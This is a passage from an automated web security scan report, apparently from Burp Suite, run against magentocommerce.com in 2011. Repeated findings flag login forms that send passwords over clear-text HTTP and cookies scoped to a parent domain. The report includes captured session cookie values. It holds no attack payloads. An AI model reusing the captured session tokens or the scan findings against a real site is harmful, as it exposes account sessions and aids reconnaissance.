Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.138. http://www.magentocommerce.com/showcase  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.139. http://www.magentocommerce.com/sitemap/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.140. http://www.magentocommerce.com/support/magento-user-guide-book  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.141. http://www.magentocommerce.com/support/magento_core_api  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.142. http://www.magentocommerce.com/support/overview  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.143. http://www.magentocommerce.com/svn  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.144. http://www.magentocommerce.com/system-requirements  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.145. http://www.magentocommerce.com/translations  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.146. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.147. http://www.magentocommerce.com/vi  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.148. http://www.magentocommerce.com/virtual/download-magento/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.149. http://www.magentocommerce.com/virtual/enterprise-register/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.150. http://www.magentocommerce.com/whitepaper/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
3. Cookie scoped to parent domain  previous  next
There are 169 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

3.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
